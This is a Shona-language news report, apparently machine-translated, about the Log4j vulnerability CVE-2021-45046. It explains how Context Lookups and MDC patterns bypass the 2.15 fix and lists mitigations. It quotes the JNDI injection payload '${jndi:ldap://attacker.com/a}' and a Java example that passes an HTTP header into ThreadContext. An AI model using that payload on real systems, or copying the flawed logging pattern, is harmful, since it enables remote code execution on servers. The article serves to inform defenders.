Kumwe kusagadzikana kwakaonekwa mukuitwa kweJNDI lookups muLog4j 2 raibhurari (CVE-2021-45046), iyo inoonekwa zvisinei nekugadziriswa kwakawedzerwa mukuburitswa 2.15 uye zvisinei nekushandiswa kweiyo "log4j2.noFormatMsgLookup" kuseta yekudzivirira. Dambudziko rine njodzi kunyanya kune ekare vhezheni yeLog4j 2, yakachengetedzwa uchishandisa "noFormatMsgLookup" mureza, sezvo zvichiita kuti zvikwanise kunzvenga dziviriro kubva mukusagadzikana kwakapfuura (Log4Shell, CVE-2021-44228), iyo inokutendera kuti uite kodhi yako pa server. Kune vashandisi vevhezheni 2.15, kushandiswa kunogumira pakukonzera kuti application iparare nekuda kwekuneta kwezviwanikwa zviripo.
Kusagadzikana kunongoonekwa pamasisitimu anoshandisa Context Lookups pakucheka matanda, se${ctx:loginId}, kana matemplate eMDC (Thread Context Map), akadai se%X, %mdc, uye %MDC. Kushanda kunouya pakugadzira mamiriro ekuburitsa data ine JNDI inotsiva kune irogi kana uchishandisa mamiriro ebvunzo kana MDC matemplate mukushandisa inotsanangura iyo mitemo yekufometa zvinobuda kune irogi.
Vatsvagiri kubva kuLunaSec vakacherekedza kuti kune shanduro dzeLog4j isingasviki 2.15, kusagadzikana uku kunogona kushandiswa sevheji nyowani yekurwiswa kweLog4Shell, zvichitungamira mukuitwa kwekodhi, kana ThreadContext mataurirwo anosanganisira data rekunze achishandiswa mukubuda kwelog, zvisinei nekuti "chengetedza" mureza wakabatidzwa. noMsgFormatLookups" kana kuti "%m{nolookups}".
Kupfuura dziviriro kunouya kunyaya yekuti pachinzvimbo chekutsiva zvakananga "${jndi:ldap://attacker.com/a}", chirevo ichi chinotsiviwa kuburikidza nekukosha kwechinhu chepakati chinoshandiswa mumirau yekufometa zvinobuda. . Semuyenzaniso, kana mubvunzo wekubvunza ${ctx:apiversion} ukashandiswa pakubuditsa kulogi, kurwisa kunogona kuitwa nekuisa data "${jndi:ldap://attacker.com/a}" kukosha kwakanyorwa kune apiversion variable. Muenzaniso wekodhi isina njodzi: appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n @ GetMapping("/") yeruzhinji String index(@RequestHeader("X-Api-Version") String apiVersion) {// Iyo "X-Api-Version" HTTP musoro wemusoro unopfuudzwa kune ThreadContext ThreadContext.put("apiversion ", apiVersion ); // Kana uchibuditsa kurogi, iyo yekunze apiversion kukosha ichagadziriswa uchishandisa inotsiva ${ctx:apiversion} logger.info("Yakagamuchira chikumbiro cheAPI vhezheni"); dzoka "Mhoro, nyika!"; }
MuLog4j vhezheni 2.15, kusazvibata kunogona kushandiswa kuita kurwisa kweDoS kana uchipfuudza kukosha kuThreadContext, zvichikonzera loop mukubuda kwefomati template kugadzirisa.
Zvidzoreso 2.16 uye 2.12.2 zvakaburitswa kuvharira kusagadzikana. Mubazi reLog4j 2.16, mukuwedzera kune zvigadziriso zvakaitwa muvhezheni 2.15 uye kusungirirwa kweJNDI LDAP zvikumbiro kune "localhost", mashandiro eJNDI akadzimwa zvachose nekusarudzika uye kutsigirwa kwematemplate ekutsiva meseji kunobviswa. Senzira yekuchengetedza, zvinokurudzirwa kubvisa kirasi yeJndiLookup kubva munzira yekirasi (semuenzaniso, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class") .
Unogona kutarisa kutaridzika kwezvigadziriso mumapakeji pamapeji ekugovera (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) uye Java papuratifomu vagadziri (GitHub, Docker, Oracle, vmWare, Broadcom uye Amazon/AWS, Juniper, VMware, Cisco, IBM , Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, nezvimwewo).
Source: opennet.ru